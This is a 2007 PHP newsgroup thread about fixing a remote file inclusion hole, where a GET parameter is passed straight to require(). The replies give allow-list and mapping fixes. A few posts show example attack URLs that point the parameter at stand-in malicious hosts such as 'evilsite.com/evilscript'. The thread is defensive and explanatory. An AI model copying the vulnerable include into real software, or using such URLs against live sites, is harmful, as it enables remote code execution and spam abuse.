  #1  
Old January 15th, 2007, 05:55 PM
SA SA
Guest
 
Posts: n/a
Default PHP script help

Hello,
I do not know anything about PHP but thrown into this mix. I was told
by my ISP that there is vulnerability in following code to allow
spammer load an offsite php script for mailing. The defective code is:


if (isset($HTTP_GET_VARS['sport']))
{
$sport = $HTTP_GET_VARS['sport'];
require ($sport.".php");
}


how do i fix it?

If i am in wrong group please forgive me.

thanks
sa

  #2  
Old January 15th, 2007, 06:35 PM
Areric
Guest
 
Posts: n/a
Default Re: PHP script help

My guess is that all a scammer would need to do would be to pass a
script in the url that would point to something malicious on another
server.

So for example say your site is mysite.com and the name of this script
is mailscript.php

I could navigate to your site as

http://www.mysite.com/mailscript.php...com/evilscript

Your script would then take that whole string
"www.evilsite.com/evilscript", append ".php" and include it. (the .s and /
would need to be converted to % notation first but same idea).

Fixing it would require you to submit the variable in POST, although I'm
not too sure if that's 100%.


  #3  
Old January 15th, 2007, 06:55 PM
Iván Sánchez Ortega
Guest
 
Posts: n/a
Default Re: PHP script help

SA SA wrote:
> if (isset($HTTP_GET_VARS['sport']))
> {
> $sport = $HTTP_GET_VARS['sport'];
> require ($sport.".php");
> }
>
> how do i fix it?

PHP security rule number 1: Never ever trust anything that comes from the
user.

In this case, the 'sport' GET variable can be crafted to inject code (other
posts in this thread indicate how).

There are several techniques to avoid this. One is to make sure that the
file you are about to include() (or require(), for that matter) is a local
file. See the PHP manual for functions on that issue.

Other technique, my favourite, is to manually check the possible values of
the received variable. It goes something like this:

if (isset($_GET['sport']))
{
    $sport = $_GET['sport'];

    if ($sport == 'football')
        require ('football.php');
    elseif ($sport == 'tennis')
        require ('tennis.php');
    elseif ($sport == 'skydiving')
        require ('skydiving.php');
    else
    {
        // trigger_error() takes the message first, then the error level
        trigger_error('Wrong sport, dude!', E_USER_ERROR);
        die(); // Just in case trigger_error() doesn't stop execution
    }
}



In any case, in any PHP app, if the user enters a "strange" value, or an
invalid value for a variable, the safest way to go is to throw an error and
abort execution.

Check that entered numbers are really numbers (or cast 'em to an int type
variable), that strings in a possible set of values are really in that set
of values, and that arbitrary strings to be inserted into a database are
escaped properly.


--
----------------------------------
Iván Sánchez Ortega -ivansanchez-algarroba-escomposlinux-punto-org-

Mmmmmmmmmmmmmmmmmmmmm..... so many m's.
  #4  
Old January 15th, 2007, 06:55 PM
P Pulkkinen
Guest
 
Posts: n/a
Default Re: PHP script help

> I do not know anything about PHP but thrown into this mix. I was told
> by my ISP that there is vulnerability in following code to allow
> spammer load an offsite php script for mailing. The defective code is:
>
> if (isset($HTTP_GET_VARS['sport']))
> {
> $sport = $HTTP_GET_VARS['sport'];
> require ($sport.".php");
> }

$allowable_sports = array("football", "rugby", "tennis");

if (isset($HTTP_GET_VARS['sport']) && in_array($HTTP_GET_VARS['sport'], $allowable_sports))
{
    $sport = $HTTP_GET_VARS['sport']; // only reached for a value on the allow-list
    require ($sport.".php");
}
else
{
    require ("no_sport_just_sofa.php");
}


  #5  
Old January 15th, 2007, 08:35 PM
SA SA
Guest
 
Posts: n/a
Default Re: PHP script help

I will give it a try. Basically, we have a link for each sport that
passes the variable to sports.php based on the sport the sports.php
displays news releases.

suresh

http://www.domain.org/sports.php?sport=m_football
http://www.domain.org/sports.php?sport=m_softball
http://www.domain.org/sports.php?sport=m_soccr
  #6  
Old January 15th, 2007, 10:15 PM
Michael Austin
Guest
 
Posts: n/a
Default Re: PHP script help

I would use a drop-down where the value passed is
football value= s1,
tennis value = s2,
tiddlywinks=s3,etc...

look at the CASE functionality.

then in my php script associate s1 to INCLUDE vfootball.php such that the
end user cannot guess your file structures etc... the more they know about your
structures, the more likely it will be that they will find a vulnerability. And
the vfootball.php should be outside the web directories but readable, and not
writeable by the web server owner.

--
Michael Austin
Database Consultant
Domain Registration and Linux/Windows Web Hosting Reseller
http://www.spacelots.com
  #7  
Old January 15th, 2007, 10:55 PM
Colin McKinnon
Guest
 
Posts: n/a
Default Re: PHP script help

SA SA wrote:
> Hello,
> I do not know anything about PHP but thrown into this mix. I was told
> by my ISP that there is vulnerability in following code to allow
> spammer load an offsite php script for mailing.

There are 2 very odd things about this:

1) that you have an ISP who is willing to take the time to read your code
(interesting, and a big plus)

2) that your host is not configured to prevent this (a bit worrying,
depending on the reason for 1).

To exploit this, someone just has to enter a URL like:

http://www.sasas-site.com/code.php?s...%2Fmalware.src

to get their code into your ISP's webserver.

> how do i fix it?

Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
values.

C.
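Putting the thread's advice together in one script, as an added example that is not code from any poster: the allow-list from posts #3, #4 and #7, the opaque key-to-file mapping and out-of-webroot placement from post #6, and the "is it really a local file" check from post #3. The include directory and file names are assumptions.

```php
<?php
// Added example (not code from the thread): a hardened sports.php that
// combines the allow-list advice from posts #3, #4 and #7 with the opaque
// key -> file mapping and out-of-webroot placement suggested in post #6.
// The include directory below is a hypothetical path.

$include_dir = '/var/www/includes/sports';   // outside DOCUMENT_ROOT (assumed)

// The request value is only ever a lookup key; it is never concatenated
// into a path, so "../" or "http://" in it cannot change what is loaded.
$sport_pages = array(
    's1' => 'vfootball.php',
    's2' => 'vsoftball.php',
    's3' => 'vsoccer.php',
);

function resolve_sport_page($key, array $pages, $dir)
{
    // $_GET values can be arrays (?sport[]=x), so type-check before lookup.
    if (!is_string($key) || !array_key_exists($key, $pages)) {
        return null;
    }
    // Belt and braces: confirm the mapped file really is a local file
    // inside $dir (the "make sure it is a local file" technique from
    // post #3). Catches a mistyped table entry or a stray symlink.
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $pages[$key]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = isset($_GET['sport'])
    ? resolve_sport_page($_GET['sport'], $sport_pages, $include_dir)
    : null;

if ($page === null) {
    // Unknown or missing sport: fail closed with a fixed page, never with
    // anything derived from the request.
    header('HTTP/1.1 400 Bad Request');
    require 'no_sport_just_sofa.php';
    exit;
}

require $page;
```

The host-side counterpart to Colin's point 2 is setting allow_url_include=Off (and allow_url_fopen=Off where nothing needs it) in php.ini, so require() refuses remote URLs regardless of what a script passes to it.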
  #8  
Old January 16th, 2007, 12:25 AM
SA SA
Guest
 
Posts: n/a
Default Re: PHP script help

Sorry to be ignorant, but should not "P Pulkkinen"'s solution work?
Please advise if I am overlooking something.

The hosting company I am using should plug the hole, but if the code
itself is buggy then I don't blame them.

<-------------

$allowable_sports = array("football", "rugby", "tennis");

if (isset($HTTP_GET_VARS['sport']) &&
    in_array($HTTP_GET_VARS['sport'], $allowable_sports))
{
    $sport = $HTTP_GET_VARS['sport']; // only reached for a value on the allow-list
    require ($sport.".php");
}
else
{
    require ("error.php");
}

---------------->



 
